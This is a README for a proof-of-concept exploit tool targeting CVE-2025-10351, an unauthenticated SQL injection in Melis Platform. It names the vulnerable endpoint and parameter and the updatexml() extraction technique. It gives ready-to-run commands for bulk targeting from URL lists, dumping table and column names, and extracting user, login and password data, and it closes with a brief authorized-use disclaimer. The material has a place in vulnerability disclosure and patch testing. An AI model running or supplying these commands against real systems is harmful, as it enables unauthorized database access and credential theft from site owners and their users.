# CVE-2025-10351 POC - SQL Injection Exploit 💉

> POC for CVE-2025-10351: An unauthenticated SQL Injection vulnerability that affects a specific endpoint in Melis Platform Framework.

![status](https://img.shields.io/badge/status-fully%20working-brightgreen)
![python](https://img.shields.io/badge/python-3.8%2B-blue)
![status](https://img.shields.io/badge/status-proof%20of%20concept-orange)

---

## 🔗 References

- 📄 [CVE-2025-10351 on MITRE](https://www.cve.org/CVERecord?id=CVE-2025-10351)
- 📄 [Melis Platform Warning on INCIBE (Spanish National Cybersecurity Institute)](https://www.incibe.es/incibe-cert/alerta-temprana/avisos/multiples-vulnerabilidades-en-melis-platform)

---

## 🚀 Description

This POC targets an **unauthenticated error-based SQL injection** vulnerability in the endpoint:

```
melis/MelisCms/PageEdition/getTinyTemplates?idPage=
```

It leverages `updatexml()` in MySQL to extract:

- Table names
- Column names
- Data from specific or all columns

It also detects possible **time-based SQLi** vectors for further manual exploitation.

---

## 🛠️ Requirements

Install dependencies with:

```bash
pip3 install -r requirements.txt
```

---

## 🧪 Usage

### Basic check
```bash
python3 CVE-2025-10351-POC.py -u http://target.com -p 80
```

### From URL list
```bash
python3 CVE-2025-10351-POC.py -l targets.txt
```

### Extract all table names
```bash
python3 CVE-2025-10351-POC.py -u http://target.com -p 80 -at
```

### Extract all column names from a table
```bash
python3 CVE-2025-10351-POC.py -u http://target.com -p 80 -t users
```

### Extract all data from all columns
```bash
python3 CVE-2025-10351-POC.py -u http://target.com -p 80 -t users -ac
```

### Extract specific columns
```bash
python3 CVE-2025-10351-POC.py -u http://target.com -p 80 -t users -c user,login,password
```

### Using proxy with insecure mode, cookies and debug mode
```bash
python3 CVE-2025-10351-POC.py -u http://target.com -p 80 -t users -c user,login,password --proxy http://127.0.0.1:8080 --insecure --cookies 2prkpe1h72nd4fhmlum65okc04 --debug
```

---

## ⚙️ Options

| Argument     | Description                             |
|--------------|-----------------------------------------|
| `-u`         | Target URL                               |
| `-p`         | Port (80, 443, etc.)                     |
| `-l`         | File containing list of URLs             |
| `-s`         | Sleep time for time-based tests (default: 1s) |
| `-at`        | Dump all table names                     |
| `-t`         | Specify table name                       |
| `-ac`        | Dump all columns of given table          |
| `-c`         | Comma-separated list of columns to dump  |
| `--proxy`         | Burp Proxy http://127.0.0.1:8080 |
| `--insecure`         | Disable TLS checks when using proxy connections |
| `--cookie`         | Cookies for auth requests  |
| `--debug`         | Debug mode |
---

## 📤 Output

- Extracted tables saved to `tables_extracted.txt`
- Extracted data saved to `<table_name>_data.txt`

---

## ⚠️ Disclaimer

This document is for authorized security testing and remediation only. Do **not** use the PoC or reproduction steps against systems you do not own or do not have explicit permission to test. The author is not responsible for misuse.

---

Made with ❤️ by Manuel Iván San Martín Castillo
